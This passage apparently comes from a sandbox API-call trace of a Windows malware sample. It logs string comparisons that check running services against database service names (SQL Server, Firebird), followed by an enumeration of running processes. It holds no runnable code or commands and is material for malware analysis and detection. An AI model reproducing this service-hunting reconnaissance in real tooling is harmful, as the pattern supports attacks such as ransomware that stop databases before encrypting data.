lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0170.753] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0170.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0170.753] lstrlenW (lpString="netprofm") returned 8 [0170.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0170.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0170.754] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0170.754] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0170.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0170.754] lstrlenW (lpString="NgcSvc") returned 6 [0170.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0170.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0170.754] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0170.754] lstrlenW (lpString="NlaSvc") returned 6 [0170.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0170.754] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0170.754] lstrlenW (lpString="nsi") returned 3 [0170.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0170.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0170.754] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0170.754] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0170.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0170.754] lstrlenW (lpString="PcaSvc") returned 6 [0170.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0170.754] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0170.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0170.754] lstrlenW (lpString="PlugPlay") returned 8 [0170.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0170.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0170.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0170.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0170.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0170.755] lstrlenW (lpString="Power") returned 5 [0170.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0170.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0170.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0170.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0170.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0170.755] lstrlenW (lpString="ProfSvc") returned 7 [0170.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0170.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0170.755] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0170.755] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0170.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0170.755] lstrlenW (lpString="RpcEptMapper") returned 12 [0170.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0170.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0170.755] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0170.755] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0170.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0170.755] lstrlenW (lpString="RpcSs") returned 5 [0170.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0170.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0170.755] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0170.755] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0170.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0170.755] lstrlenW (lpString="SamSs") returned 5 [0170.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0170.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0170.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0170.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0170.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0170.756] lstrlenW (lpString="Schedule") returned 8 [0170.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0170.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0170.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0170.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0170.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0170.756] lstrlenW (lpString="SecurityHealthService") returned 21 [0170.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0170.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0170.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0170.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0170.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0170.756] lstrlenW (lpString="SENS") returned 4 [0170.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0170.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0170.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0170.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0170.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0170.756] lstrlenW (lpString="ShellHWDetection") returned 16 [0170.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0170.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0170.756] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0170.756] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0170.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0170.756] lstrlenW (lpString="Spooler") returned 7 [0170.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0170.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0170.866] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0170.866] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0170.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0170.866] lstrlenW (lpString="StateRepository") returned 15 [0170.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0170.866] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0170.866] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0170.866] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0170.866] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0170.866] lstrlenW (lpString="SysMain") returned 7 [0170.866] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0170.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0170.867] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0170.867] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0170.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0170.867] lstrlenW (lpString="SystemEventsBroker") returned 18 [0170.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0170.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0170.867] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0170.867] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0170.867] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0170.867] lstrlenW (lpString="Themes") returned 6 [0170.867] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0170.867] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0170.867] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0170.871] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0170.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0170.871] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0170.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0170.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0170.871] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0170.871] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0170.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ff6f8 | out: hHeap=0x6a0000) returned 1 [0170.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0170.878] Process32FirstW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.879] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.880] lstrlenW (lpString="System") returned 6 [0170.880] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.881] lstrlenW (lpString="smss.exe") returned 8 [0170.881] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.881] lstrlenW (lpString="csrss.exe") returned 9 [0170.881] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.882] lstrlenW (lpString="wininit.exe") returned 11 [0170.882] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.883] lstrlenW (lpString="csrss.exe") returned 9 [0170.883] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.884] lstrlenW (lpString="winlogon.exe") returned 12 [0170.884] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.884] lstrlenW (lpString="services.exe") returned 12 [0170.884] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.885] lstrlenW (lpString="lsass.exe") returned 9 [0170.885] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0170.886] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0170.886] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0170.887] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0170.888] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.888] lstrlenW (lpString="svchost.exe") returned 11 [0170.888] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.889] lstrlenW (lpString="svchost.exe") returned 11 [0170.889] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.890] lstrlenW (lpString="dwm.exe") returned 7 [0170.890] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.891] lstrlenW (lpString="svchost.exe") returned 11 [0170.891] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.891] lstrlenW (lpString="svchost.exe") returned 11 [0170.891] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.892] lstrlenW (lpString="svchost.exe") returned 11 [0170.892] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.893] lstrlenW (lpString="svchost.exe") returned 11 [0170.893] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.894] lstrlenW (lpString="svchost.exe") returned 11 [0170.894] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.894] lstrlenW (lpString="svchost.exe") returned 11 [0170.894] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.895] lstrlenW (lpString="svchost.exe") returned 11 [0170.895] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.896] lstrlenW (lpString="svchost.exe") returned 11 [0170.896] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.897] lstrlenW (lpString="svchost.exe") returned 11 [0170.897] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.897] lstrlenW (lpString="svchost.exe") returned 11 [0170.897] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.898] lstrlenW (lpString="spoolsv.exe") returned 11 [0170.898] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.899] lstrlenW (lpString="svchost.exe") returned 11 [0170.899] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.900] lstrlenW (lpString="audiodg.exe") returned 11 [0170.900] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0170.901] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0170.901] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0170.902] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0170.902] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0170.903] lstrlenW (lpString="Memory Compression") returned 18 [0170.903] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0170.904] lstrlenW (lpString="sihost.exe") returned 10 [0170.904] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.904] lstrlenW (lpString="svchost.exe") returned 11 [0170.904] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0170.905] lstrlenW (lpString="msoia.exe") returned 9 [0170.905] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0170.906] lstrlenW (lpString="taskhostw.exe") returned 13 [0170.906] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.907] lstrlenW (lpString="explorer.exe") returned 12 [0170.907] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0170.908] lstrlenW (lpString="SearchUI.exe") returned 12 [0170.908] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0170.909] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0170.909] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0170.910] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0170.910] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.911] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0170.911] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0170.911] lstrlenW (lpString="hgaibc.exe") returned 10 [0170.912] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0170.912] lstrlenW (lpString="cmd.exe") returned 7 [0170.912] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0170.913] lstrlenW (lpString="conhost.exe") returned 11 [0170.913] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0171.099] lstrlenW (lpString="consent.exe") returned 11 [0171.099] Process32NextW (in: hSnapshot=0x37c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0171.100] CloseHandle (hObject=0x37c) returned 1 